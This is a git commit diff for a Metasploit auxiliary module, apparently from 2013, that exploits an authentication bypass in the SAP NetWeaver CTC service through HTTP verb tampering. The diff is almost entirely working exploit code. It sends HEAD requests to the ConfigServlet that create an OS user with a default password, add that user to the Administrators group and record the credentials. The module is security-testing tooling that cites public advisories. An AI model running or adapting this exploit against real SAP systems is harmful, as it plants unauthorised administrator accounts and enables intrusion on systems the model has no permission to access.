Add final cleanup for sap_ctc_verb_tampering_user_mgmt

jvazquez-r7 · jvazquez-r7 · commit c21035c0b9fd · 2013-05-16T10:42:09.000-05:00
diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb
@@ -31,49 +31,78 @@ class Metasploit4 < Msf::Auxiliary
 
 	def initialize
 		super(
-			'Name' => 'SAP CTC Service Verb Tampering (add user and add role)',
+			'Name' => 'SAP CTC Service Verb Tampering User Management',
 			'Description' => %q{
-									This module exploits an authentication bypass vulnerability in SAP NetWeaver CTC service.
-									The service is vulnerable to verb tampering and allows for unauthorised user management.
-									SAP Note 1589525, 1624450 / DSECRG-11-041.
-								},
-			'References' => [['URL','http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/']],
-			'Author' => ['nmonkee'],
+					This module exploits an authentication bypass vulnerability in SAP NetWeaver
+				CTC service. The service is vulnerable to verb tampering allowing for unauthorised
+				OS user management. Information about resolution should be available at SAP notes
+				1589525 and 1624450 (authentication required).
+			},
+			'References' =>
+				[
+					[ 'URL', 'http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/' ],
+					[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf' ]
+				],
+			'Author' =>
+				[
+					'Alexandr Polyakov', # Vulnerability discovery
+					'nmonkee' # Metasploit module
+				],
 			'License' => MSF_LICENSE
-			)
+		)
 
 		register_options([
-			OptString.new('USER', [true, 'Username', nil]),
-			OptString.new('PASS', [true, 'Password', nil]),
-			OptString.new('GROUP', [true, 'Group', nil])
-			], self.class)
+			Opt::RPORT(50000),
+			OptString.new('USERNAME', [true, 'Username to create', 'msf']),
+			OptString.new('PASSWORD', [true, 'Password for the new user', '$Metasploit1234$']),
+			OptString.new('GROUP', [true, 'Group for the new user', 'Administrators'])
+		], self.class)
 	end
 
 	def run_host(ip)
-		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USER'] + ',PASSWORD=' + datastore['PASS']
-		send_request(uri)
-		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USER'] + ',GROUPNAME=' + datastore['GROUP']
-		send_request(uri)
+		vprint_status("#{rhost}:#{rport} - Creating User...")
+		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=' + datastore['USERNAME'] + ',PASSWORD=' + datastore['PASSWORD']
+		if send_request(uri)
+			print_good("#{rhost}:#{rport} - User #{datastore['USERNAME']} with password #{datastore['PASSWORD']} successfully created")
+		else
+			return
+		end
+
+		vprint_status("#{rhost}:#{rport} - Adding User to Group...")
+		uri = '/ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=' + datastore['USERNAME'] + ',GROUPNAME=' + datastore['GROUP']
+		if send_request(uri)
+			print_good("#{rhost}:#{rport} - User #{datastore['USERNAME']} added to group #{datastore['GROUP']}")
+		else
+			return
+		end
+
+		report_auth_info(
+			:host => rhost,
+			:port => rport,
+			:user => datastore['USERNAME'],
+			:pass => datastore['PASSWORD'],
+			:ptype => "password",
+			:active => true
+		)
 	end
 
 	def send_request(uri)
 		begin
-			print_status("[SAP] #{rhost}:#{rport} - sending request")
-			res = send_request_raw({
+			res = send_request_cgi({
 				'uri' => uri,
 				'method' => 'HEAD',
-				'headers' =>{
-					'Cookie' => 'sap-usercontext=sap-language=EN',
-					'Content-Type' => 'text/xml; charset=UTF-8',}
-				}, 45)
-			if res
-				vprint_error("[SAP] #{rhost}:#{rport} - Error code: " + res.code.to_s)
-				vprint_error("[SAP] #{rhost}:#{rport} - Error title: " + res.message.to_s)
-				vprint_error("[SAP] #{rhost}:#{rport} - Error message: " + res.body.to_s)
-			end
-			rescue ::Rex::ConnectionError
-				print_error("#{rhost}:#{rport} - Unable to connect")
-				return
+				'ctype' => 'text/xml; charset=UTF-8',
+				'cookie' => 'sap-usercontext=sap-language=EN'
+			})
+			if res and res.code == 200 and res.headers['Server'] =~ /SAP J2EE Engine/
+				return true
+			elsif res
+				vprint_error("#{rhost}:#{rport} - Unexpected Response: #{res.code} #{res.message}")
+				return false
 			end
+		rescue ::Rex::ConnectionError
+			vprint_error("#{rhost}:#{rport} - Unable to connect")
+			return false
 		end
 	end
+end
